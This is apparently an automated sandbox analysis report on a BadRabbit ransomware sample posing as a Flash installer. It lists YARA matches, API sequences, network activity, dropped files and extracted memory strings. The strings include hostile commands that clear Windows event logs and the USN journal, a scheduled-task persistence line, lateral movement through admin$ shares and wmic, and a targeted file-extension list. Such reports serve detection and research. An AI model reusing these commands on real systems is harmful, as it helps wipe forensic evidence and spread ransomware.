        Source: C:\Windows\dispci.exeCode function: 23_2_00DF12A0 CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,23_2_00DF12A0
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1E40 CreateEventW,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,23_2_00DF1E40
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1220 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,23_2_00DF1220
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF43B7 CryptReleaseContext,23_2_00DF43B7
        Source: download.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: download.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: lsasrv.pdb source: 2594.tmp, 0000000B.00000003.1719410656.0000000002EF6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: lsasrv.pdbUGP source: 2594.tmp, 0000000B.00000003.1719410656.0000000002EF6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000002.00000003.1717652685.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696516164.0000000002C9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696854067.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.2.dr

        Spreading

        barindex
        Contains functionality to enumerate network shares of other devices
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04859534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$2_2_04859534
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04859B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$2_2_04859B63
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04855E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,2_2_04855E9F
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1B80 PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,PathFindExtensionW,FindNextFileW,FindClose,23_2_00DF1B80

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 173.222.162.32 445Jump to behavior
        Source: Joe Sandbox ViewIP Address: 173.222.162.32 173.222.162.32
        Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
        Source: global trafficTCP traffic: 192.168.2.4:49675 -> 173.222.162.32:443
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04851CA3 GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_04851CA3
        Source: global trafficDNS traffic detected: DNS query: api.msn.com
        Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/;
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/E
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/W
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/d
        Source: rundll32.exe, 00000002.00000002.1763336798.0000000004955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1:80/top
        Source: download.exe, cscc.dat.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
        Source: rundll32.exe, 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1717652685.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696516164.0000000002C9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696854067.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000017.00000000.1746771759.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp, dispci.exe.2.dr, cscc.dat.2.drString found in binary or memory: http://diskcryptor.net/
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
        Source: qmgr.db.32.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
        Source: qmgr.db.32.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
        Source: qmgr.db.32.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: download.exe, cscc.dat.2.drString found in binary or memory: http://ocsp.thawte.com0
        Source: download.exeString found in binary or memory: http://rb.symcb.com/rb.crl0W
        Source: download.exeString found in binary or memory: http://rb.symcb.com/rb.crt0
        Source: download.exeString found in binary or memory: http://rb.symcd.com0&
        Source: download.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: download.exeString found in binary or memory: http://s.symcd.com0
        Source: download.exeString found in binary or memory: http://s.symcd.com06
        Source: download.exeString found in binary or memory: http://sf.symcb.com/sf.crl0W
        Source: download.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
        Source: download.exeString found in binary or memory: http://sf.symcd.com0&
        Source: download.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: download.exe, cscc.dat.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
        Source: download.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: download.exe, cscc.dat.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
        Source: download.exe, cscc.dat.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
        Source: download.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: download.exeString found in binary or memory: https://d.symcb.com/cps0%
        Source: download.exeString found in binary or memory: https://d.symcb.com/rpa0
        Source: download.exeString found in binary or memory: https://d.symcb.com/rpa0.
        Source: download.exeString found in binary or memory: https://d.symcb.com/rpa06
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCFF000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCE8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Contains functionality to register a low level keyboard hook
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF42A0 SetWindowsHookExW 00000002,Function_00003FC0,00000000,0000000023_2_00DF42A0
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF4070 GetDesktopWindow,GetForegroundWindow,GetShellWindow,GetCapture,GetClipboardOwner,GetOpenClipboardWindow,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetFocus,GetActiveWindow,GetKBCodePage,GetCursor,GetLastActivePopup,GetProcessHeap,GetQueueStatus,GetInputState,GetMessageTime,GetOEMCP,GetCursorInfo,GetCaretPos,GetCurrentThread,GetThreadTimes,GetCurrentProcess,GetCurrentProcess,GetProcessTimes,GetCurrentProcess,K32GetProcessMemoryInfo,QueryPerformanceCounter,GlobalMemoryStatusEx,EnumWindows,23_2_00DF4070

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Yara detected Babuk Ransomware
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7412, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dispci.exe PID: 8032, type: MEMORYSTR
        Clears the journal log
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
        Clears the windows event log
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048515A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,2_2_048515A7

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: download.exe, type: SAMPLEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 0.2.download.exe.10ce578.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 0.0.download.exe.c00000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 0.2.download.exe.c00000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 11.0.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
        Source: 2.3.rundll32.exe.2cb4d60.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 11.2.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
        Source: 2.2.rundll32.exe.2cb4d60.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.3.rundll32.exe.2cb4d60.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.3.rundll32.exe.2cb4d60.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 23.2.dispci.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: 23.2.dispci.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 23.0.dispci.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: 23.0.dispci.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.3.rundll32.exe.2cb4d60.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.3.rundll32.exe.2cb4d60.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.3.rundll32.exe.2cb4d60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.2.rundll32.exe.2cb4d60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 0.2.download.exe.10ce578.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit Payload Author: kevoreilly
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit Payload Author: kevoreilly
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit Payload Author: kevoreilly
        Source: 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Contains functionality to create processes via WMI
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32memstr_f19e9d61-d
        Source: C:\Windows\2594.tmpCode function: 11_2_00007FF73CFC214C GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,11_2_00007FF73CFC214C
        Source: C:\Windows\2594.tmpCode function: 11_2_00007FF73CFC1864 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,LocalAlloc,NtQuerySystemInformation,LocalFree,11_2_00007FF73CFC1864
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF2020: TlsGetValue,CreateFileW,TlsSetValue,DeviceIoControl,GetLastError,23_2_00DF2020
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04859534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,2_2_04859534
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04859B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,2_2_04859B63
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04858A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess,2_2_04858A23
        Source: C:\Users\user\Desktop\download.exeFile created: C:\Windows\infpub.datJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\2594.tmpJump to behavior
        Source: C:\Windows\dispci.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\CachesJump to behavior
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\infpub.datJump to behavior
        Source: C:\Users\user\Desktop\download.exeCode function: 0_2_00C038400_2_00C03840
        Source: C:\Users\user\Desktop\download.exeCode function: 0_2_00C0201D0_2_00C0201D
        Source: C:\Users\user\Desktop\download.exeCode function: 0_2_00C030E30_2_00C030E3
        Source: C:\Users\user\Desktop\download.exeCode function: 0_2_00C0173C0_2_00C0173C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0485A83C2_2_0485A83C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0485C1E32_2_0485C1E3
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048527082_2_04852708
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0485B11D2_2_0485B11D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0485C9402_2_0485C940
        Source: C:\Windows\2594.tmpCode function: 11_2_00007FF73CFC5C0011_2_00007FF73CFC5C00
        Source: C:\Windows\dispci.exeCode function: 23_2_00E018BC23_2_00E018BC
        Source: C:\Windows\dispci.exeCode function: 23_2_00E00C8F23_2_00E00C8F
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF280023_2_00DF2800
        Source: C:\Windows\dispci.exeCode function: 23_2_00E011E023_2_00E011E0
        Source: C:\Windows\dispci.exeCode function: 23_2_00E025F423_2_00E025F4
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF82CA23_2_00DF82CA
        Source: C:\Windows\dispci.exeCode function: 23_2_00E0073E23_2_00E0073E
        Source: Joe Sandbox ViewDropped File: C:\Windows\cscc.dat 0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
        Source: C:\Windows\SysWOW64\wevtutil.exeProcess token adjusted: SecurityJump to behavior
        Source: download.exeStatic PE information: invalid certificate
        Source: download.exe, 00000000.00000002.1694487596.00000000010BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlashUtil.exev+ vs download.exe
        Source: download.exe, 00000000.00000000.1692531626.0000000000C09000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFlashUtil.exev+ vs download.exe
        Source: download.exeBinary or memory string: OriginalFilenameFlashUtil.exev+ vs download.exe
        Source: unknownDriver loaded: C:\Windows\System32\cdd.dll
        Source: download.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: download.exe, type: SAMPLEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.download.exe.10ce578.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.0.download.exe.c00000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
